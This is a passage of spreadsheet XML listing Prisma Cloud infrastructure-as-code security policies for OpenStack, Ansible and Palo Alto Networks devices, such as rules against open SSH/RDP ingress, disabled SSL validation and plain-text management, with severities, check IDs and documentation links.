        </is>
      </c>
      <c r="V1417" t="inlineStr">
        <is>
          <t>IaC:Networking:openstack-compute-secgroup-v2,openstack-networking-secgroup-rule-v2</t>
        </is>
      </c>
      <c r="W1417" t="inlineStr">
        <is>
          <t>Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)</t>
        </is>
      </c>
      <c r="X1417" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/openstack-policies/openstack-policy-index/bc-openstack-networking-2</t>
        </is>
      </c>
      <c r="Y1417" t="inlineStr"/>
      <c r="Z1417" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["openstack_compute_secgroup_v2","openstack_networking_secgroup_rule_v2"]}</t>
        </is>
      </c>
      <c r="AA1417" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1417" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1417" t="inlineStr">
        <is>
          <t>CKV_OPENSTACK_3</t>
        </is>
      </c>
      <c r="AD1417" t="b">
        <v>1</v>
      </c>
      <c r="AE1417" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1417" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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7" t="inlineStr">
        <is>
          <t>2c994aa0-eadb-438a-ad2d-fdd74df04c9e</t>
        </is>
      </c>
      <c r="AI1417" t="inlineStr"/>
      <c r="AJ1417" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1417" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1418">
      <c r="A1418" t="inlineStr"/>
      <c r="B1418" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1418" s="2" t="inlineStr"/>
      <c r="D1418" t="inlineStr"/>
      <c r="E1418" t="inlineStr"/>
      <c r="F1418" t="inlineStr"/>
      <c r="G1418" t="b">
        <v>1</v>
      </c>
      <c r="H14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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1418" t="inlineStr">
        <is>
          <t>IaC:Networking:openstack-compute</t>
        </is>
      </c>
      <c r="K1418" t="inlineStr">
        <is>
          <t>OpenStack Security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp)</t>
        </is>
      </c>
      <c r="L1418" t="inlineStr"/>
      <c r="M1418" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1418" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1418" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1418" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1418" t="inlineStr"/>
      <c r="R1418" t="inlineStr"/>
      <c r="S1418" t="inlineStr"/>
      <c r="T1418" t="b">
        <v>0</v>
      </c>
      <c r="U1418" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1418" t="inlineStr">
        <is>
          <t>IaC:Networking:openstack-compute-secgroup-v2,openstack-networking-secgroup-rule-v2</t>
        </is>
      </c>
      <c r="W1418" t="inlineStr">
        <is>
          <t>Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp)</t>
        </is>
      </c>
      <c r="X1418" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/openstack-policies/openstack-policy-index/bc-openstack-networking-1</t>
        </is>
      </c>
      <c r="Y1418" t="inlineStr"/>
      <c r="Z1418" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["openstack_compute_secgroup_v2","openstack_networking_secgroup_rule_v2"]}</t>
        </is>
      </c>
      <c r="AA1418" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1418" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1418" t="inlineStr">
        <is>
          <t>CKV_OPENSTACK_2</t>
        </is>
      </c>
      <c r="AD1418" t="b">
        <v>1</v>
      </c>
      <c r="AE1418" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1418" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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8" t="inlineStr">
        <is>
          <t>fa01807e-61b1-4582-af35-840299eebc3e</t>
        </is>
      </c>
      <c r="AI1418" t="inlineStr"/>
      <c r="AJ1418" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1418" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1419">
      <c r="A1419" t="inlineStr"/>
      <c r="B1419" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1419" s="2" t="inlineStr"/>
      <c r="D1419" t="inlineStr"/>
      <c r="E1419" t="inlineStr"/>
      <c r="F1419" t="inlineStr"/>
      <c r="G1419" t="b">
        <v>1</v>
      </c>
      <c r="H14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19" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1419" t="inlineStr">
        <is>
          <t>IaC:Networking:openstack-fw</t>
        </is>
      </c>
      <c r="K1419" t="inlineStr">
        <is>
          <t>OpenStack firewall rule does not have destination IP configured</t>
        </is>
      </c>
      <c r="L1419" t="inlineStr"/>
      <c r="M1419" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1419" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1419" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1419" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1419" t="inlineStr"/>
      <c r="R1419" t="inlineStr"/>
      <c r="S1419" t="inlineStr"/>
      <c r="T1419" t="b">
        <v>0</v>
      </c>
      <c r="U1419" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1419" t="inlineStr">
        <is>
          <t>IaC:Networking:openstack-fw-rule-v1</t>
        </is>
      </c>
      <c r="W1419" t="inlineStr">
        <is>
          <t>Ensure firewall rule set a destination IP</t>
        </is>
      </c>
      <c r="X1419" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-firewall-rule-has-destination-ip-configured</t>
        </is>
      </c>
      <c r="Y1419" t="inlineStr"/>
      <c r="Z1419" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["openstack_fw_rule_v1"]}</t>
        </is>
      </c>
      <c r="AA1419" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1419" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1419" t="inlineStr">
        <is>
          <t>CKV_OPENSTACK_5</t>
        </is>
      </c>
      <c r="AD1419" t="b">
        <v>1</v>
      </c>
      <c r="AE1419" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1419" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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19" t="inlineStr">
        <is>
          <t>245d30b8-6f46-40c1-bc54-a0a80347c436</t>
        </is>
      </c>
      <c r="AI1419" t="inlineStr"/>
      <c r="AJ1419" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1419" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1420">
      <c r="A1420" t="inlineStr"/>
      <c r="B1420" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1420" s="2" t="inlineStr"/>
      <c r="D1420" t="inlineStr"/>
      <c r="E1420" t="inlineStr"/>
      <c r="F1420" t="inlineStr"/>
      <c r="G1420" t="b">
        <v>1</v>
      </c>
      <c r="H14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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1420" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.ansible.builtin.dnf,tasks.dnf</t>
        </is>
      </c>
      <c r="K1420" t="inlineStr">
        <is>
          <t>SSL validation disabled within Ansible DNF module</t>
        </is>
      </c>
      <c r="L1420" t="inlineStr"/>
      <c r="M1420" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1420" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1420" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1420" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1420" t="inlineStr"/>
      <c r="R1420" t="inlineStr"/>
      <c r="S1420" t="inlineStr"/>
      <c r="T1420" t="b">
        <v>0</v>
      </c>
      <c r="U1420" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1420" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.ansible.builtin.dnf,tasks.dnf</t>
        </is>
      </c>
      <c r="W1420" t="inlineStr">
        <is>
          <t>Ensure that SSL validation isn't disabled with dnf</t>
        </is>
      </c>
      <c r="X1420" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ansible-policies/ansible-networking-policies/ansible-2-5</t>
        </is>
      </c>
      <c r="Y1420" t="inlineStr"/>
      <c r="Z1420" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.ansible.builtin.dnf","tasks.dnf"]}</t>
        </is>
      </c>
      <c r="AA1420" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1420" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1420" t="inlineStr">
        <is>
          <t>CKV2_ANSIBLE_5</t>
        </is>
      </c>
      <c r="AD1420" t="b">
        <v>1</v>
      </c>
      <c r="AE1420" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1420" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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0" t="inlineStr">
        <is>
          <t>1851ff52-53c2-45be-be15-00b837491f77</t>
        </is>
      </c>
      <c r="AI1420" t="inlineStr"/>
      <c r="AJ1420" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1420" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1421">
      <c r="A1421" t="inlineStr"/>
      <c r="B1421" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1421" s="2" t="inlineStr"/>
      <c r="D1421" t="inlineStr"/>
      <c r="E1421" t="inlineStr"/>
      <c r="F1421" t="inlineStr"/>
      <c r="G1421" t="b">
        <v>1</v>
      </c>
      <c r="H14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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1421" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.ansible.builtin.dnf,tasks.dnf</t>
        </is>
      </c>
      <c r="K1421" t="inlineStr">
        <is>
          <t>Certificate validation disabled within Ansible DNF module</t>
        </is>
      </c>
      <c r="L1421" t="inlineStr"/>
      <c r="M1421" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1421" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1421" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1421" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1421" t="inlineStr"/>
      <c r="R1421" t="inlineStr"/>
      <c r="S1421" t="inlineStr"/>
      <c r="T1421" t="b">
        <v>0</v>
      </c>
      <c r="U1421" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1421" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.ansible.builtin.dnf,tasks.dnf</t>
        </is>
      </c>
      <c r="W1421" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled with dnf</t>
        </is>
      </c>
      <c r="X1421" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ansible-policies/ansible-networking-policies/ansible-2-6</t>
        </is>
      </c>
      <c r="Y1421" t="inlineStr"/>
      <c r="Z1421" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.ansible.builtin.dnf","tasks.dnf"]}</t>
        </is>
      </c>
      <c r="AA1421" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1421" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1421" t="inlineStr">
        <is>
          <t>CKV2_ANSIBLE_6</t>
        </is>
      </c>
      <c r="AD1421" t="b">
        <v>1</v>
      </c>
      <c r="AE1421" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1421" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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1" t="inlineStr">
        <is>
          <t>fe27743a-9593-4211-be01-117731dec115</t>
        </is>
      </c>
      <c r="AI1421" t="inlineStr"/>
      <c r="AJ1421" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1421" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1422">
      <c r="A1422" t="inlineStr"/>
      <c r="B1422" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1422" s="2" t="inlineStr"/>
      <c r="D1422" t="inlineStr"/>
      <c r="E1422" t="inlineStr"/>
      <c r="F1422" t="inlineStr"/>
      <c r="G1422" t="b">
        <v>1</v>
      </c>
      <c r="H14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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1422" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.ansible.builtin.get-url,tasks.get</t>
        </is>
      </c>
      <c r="K1422" t="inlineStr">
        <is>
          <t>HTTPS url not used with Ansible get_url module</t>
        </is>
      </c>
      <c r="L1422" t="inlineStr"/>
      <c r="M1422" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1422" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1422" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1422" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1422" t="inlineStr"/>
      <c r="R1422" t="inlineStr"/>
      <c r="S1422" t="inlineStr"/>
      <c r="T1422" t="b">
        <v>0</v>
      </c>
      <c r="U1422" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1422" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.ansible.builtin.get-url,tasks.get-url</t>
        </is>
      </c>
      <c r="W1422" t="inlineStr">
        <is>
          <t>Ensure that HTTPS url is used with get_url</t>
        </is>
      </c>
      <c r="X1422" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ansible-policies/ansible-networking-policies/ansible-2-2</t>
        </is>
      </c>
      <c r="Y1422" t="inlineStr"/>
      <c r="Z1422" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.ansible.builtin.get_url","tasks.get_url"]}</t>
        </is>
      </c>
      <c r="AA1422" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1422" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1422" t="inlineStr">
        <is>
          <t>CKV2_ANSIBLE_2</t>
        </is>
      </c>
      <c r="AD1422" t="b">
        <v>1</v>
      </c>
      <c r="AE1422" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1422" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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2" t="inlineStr">
        <is>
          <t>2a299cde-5ad5-443b-b969-e3d38db1ab71</t>
        </is>
      </c>
      <c r="AI1422" t="inlineStr"/>
      <c r="AJ1422" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1422" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1423">
      <c r="A1423" t="inlineStr"/>
      <c r="B1423" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1423" s="2" t="inlineStr"/>
      <c r="D1423" t="inlineStr"/>
      <c r="E1423" t="inlineStr"/>
      <c r="F1423" t="inlineStr"/>
      <c r="G1423" t="b">
        <v>1</v>
      </c>
      <c r="H14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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1423" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.ansible.builtin.uri,tasks.uri</t>
        </is>
      </c>
      <c r="K1423" t="inlineStr">
        <is>
          <t>HTTPS url not used with Ansible uri</t>
        </is>
      </c>
      <c r="L1423" t="inlineStr"/>
      <c r="M1423" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1423" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1423" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1423" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1423" t="inlineStr"/>
      <c r="R1423" t="inlineStr"/>
      <c r="S1423" t="inlineStr"/>
      <c r="T1423" t="b">
        <v>0</v>
      </c>
      <c r="U1423" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1423" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.ansible.builtin.uri,tasks.uri</t>
        </is>
      </c>
      <c r="W1423" t="inlineStr">
        <is>
          <t>Ensure that HTTPS url is used with uri</t>
        </is>
      </c>
      <c r="X1423" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ansible-policies/ansible-networking-policies/ansible-2-1</t>
        </is>
      </c>
      <c r="Y1423" t="inlineStr"/>
      <c r="Z1423" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.ansible.builtin.uri","tasks.uri"]}</t>
        </is>
      </c>
      <c r="AA1423" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1423" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1423" t="inlineStr">
        <is>
          <t>CKV2_ANSIBLE_1</t>
        </is>
      </c>
      <c r="AD1423" t="b">
        <v>1</v>
      </c>
      <c r="AE1423" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1423" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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3" t="inlineStr">
        <is>
          <t>e946dd4f-a599-40c6-a2d0-65f5075cd300</t>
        </is>
      </c>
      <c r="AI1423" t="inlineStr"/>
      <c r="AJ1423" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1423" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1424">
      <c r="A1424" t="inlineStr"/>
      <c r="B1424" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1424" s="2" t="inlineStr"/>
      <c r="D1424" t="inlineStr"/>
      <c r="E1424" t="inlineStr"/>
      <c r="F1424" t="inlineStr"/>
      <c r="G1424" t="b">
        <v>1</v>
      </c>
      <c r="H14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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1424" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-ipsec</t>
        </is>
      </c>
      <c r="K1424" t="inlineStr">
        <is>
          <t>IPsec profile uses insecure authentication protocols on Palo Alto Networks devices</t>
        </is>
      </c>
      <c r="L1424" t="inlineStr"/>
      <c r="M1424" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1424" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1424" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1424" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1424" t="inlineStr"/>
      <c r="R1424" t="inlineStr"/>
      <c r="S1424" t="inlineStr"/>
      <c r="T1424" t="b">
        <v>0</v>
      </c>
      <c r="U1424" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1424" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-ipsec-profile</t>
        </is>
      </c>
      <c r="W1424" t="inlineStr">
        <is>
          <t>Ensure IPsec profiles do not specify use of insecure protocols</t>
        </is>
      </c>
      <c r="X1424" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-13</t>
        </is>
      </c>
      <c r="Y1424" t="inlineStr"/>
      <c r="Z1424" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_ipsec_profile"]}</t>
        </is>
      </c>
      <c r="AA1424" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1424" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1424" t="inlineStr">
        <is>
          <t>CKV_PAN_13</t>
        </is>
      </c>
      <c r="AD1424" t="b">
        <v>1</v>
      </c>
      <c r="AE1424" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1424" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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4" t="inlineStr">
        <is>
          <t>ff3ff9b6-e94d-4ae1-828d-b3992857d331</t>
        </is>
      </c>
      <c r="AI1424" t="inlineStr"/>
      <c r="AJ1424" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1424" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1425">
      <c r="A1425" t="inlineStr"/>
      <c r="B1425" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1425" s="2" t="inlineStr"/>
      <c r="D1425" t="inlineStr"/>
      <c r="E1425" t="inlineStr"/>
      <c r="F1425" t="inlineStr"/>
      <c r="G1425" t="b">
        <v>1</v>
      </c>
      <c r="H14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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1425" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-ipsec</t>
        </is>
      </c>
      <c r="K1425" t="inlineStr">
        <is>
          <t>IPsec profile uses insecure authentication algorithms on Palo Alto Networks devices</t>
        </is>
      </c>
      <c r="L1425" t="inlineStr"/>
      <c r="M1425" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1425" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1425" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1425" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1425" t="inlineStr"/>
      <c r="R1425" t="inlineStr"/>
      <c r="S1425" t="inlineStr"/>
      <c r="T1425" t="b">
        <v>0</v>
      </c>
      <c r="U1425" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1425" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-ipsec-profile</t>
        </is>
      </c>
      <c r="W1425" t="inlineStr">
        <is>
          <t>Ensure IPsec profiles do not specify use of insecure authentication algorithms</t>
        </is>
      </c>
      <c r="X1425" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-12</t>
        </is>
      </c>
      <c r="Y1425" t="inlineStr"/>
      <c r="Z1425" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_ipsec_profile"]}</t>
        </is>
      </c>
      <c r="AA1425" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1425" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1425" t="inlineStr">
        <is>
          <t>CKV_PAN_12</t>
        </is>
      </c>
      <c r="AD1425" t="b">
        <v>1</v>
      </c>
      <c r="AE1425" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1425" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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5" t="inlineStr">
        <is>
          <t>a9ed2462-ec77-43dd-88db-7e777729ea70</t>
        </is>
      </c>
      <c r="AI1425" t="inlineStr"/>
      <c r="AJ1425" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1425" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1426">
      <c r="A1426" t="inlineStr"/>
      <c r="B1426" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1426" s="2" t="inlineStr"/>
      <c r="D1426" t="inlineStr"/>
      <c r="E1426" t="inlineStr"/>
      <c r="F1426" t="inlineStr"/>
      <c r="G1426" t="b">
        <v>1</v>
      </c>
      <c r="H14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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1426" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-management</t>
        </is>
      </c>
      <c r="K1426" t="inlineStr">
        <is>
          <t>Plain-text management Telnet enabled for Interface Management Profile in Palo Alto Networks devices</t>
        </is>
      </c>
      <c r="L1426" t="inlineStr"/>
      <c r="M1426" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1426" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1426" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1426" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1426" t="inlineStr"/>
      <c r="R1426" t="inlineStr"/>
      <c r="S1426" t="inlineStr"/>
      <c r="T1426" t="b">
        <v>0</v>
      </c>
      <c r="U1426" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1426" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-management-profile</t>
        </is>
      </c>
      <c r="W1426" t="inlineStr">
        <is>
          <t>Ensure plain-text management Telnet is not enabled for an Interface Management Profile</t>
        </is>
      </c>
      <c r="X1426" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/panos-policies/panos-policies-index/ansible-panos-3</t>
        </is>
      </c>
      <c r="Y1426" t="inlineStr"/>
      <c r="Z1426" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["tasks.paloaltonetworks.panos.panos_management_profile"]}</t>
        </is>
      </c>
      <c r="AA1426" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1426" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1426" t="inlineStr">
        <is>
          <t>CKV_PAN_3</t>
        </is>
      </c>
      <c r="AD1426" t="b">
        <v>1</v>
      </c>
      <c r="AE1426" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1426" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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6" t="inlineStr">
        <is>
          <t>0f6c6e8c-e5bb-44a2-9be8-971e9f9b2616</t>
        </is>
      </c>
      <c r="AI1426" t="inlineStr"/>
      <c r="AJ1426" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1426" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1427">
      <c r="A1427" t="inlineStr"/>
      <c r="B1427" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1427" s="2" t="inlineStr"/>
      <c r="D1427" t="inlineStr"/>
      <c r="E1427" t="inlineStr"/>
      <c r="F1427" t="inlineStr"/>
      <c r="G1427" t="b">
        <v>1</v>
      </c>
      <c r="H14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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1427" t="inlineStr">
        <is>
          <t>IaC:Networking:tasks.paloaltonetworks.panos.panos-management</t>
        </is>
      </c>
      <c r="K1427" t="inlineStr">
        <is>
          <t>Plain-text management HTTP enabled for Interface Management Profile in Palo Alto Networks devices</t>
        </is>
      </c>
      <c r="L1427" t="inlineStr"/>
      <c r="M1427" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
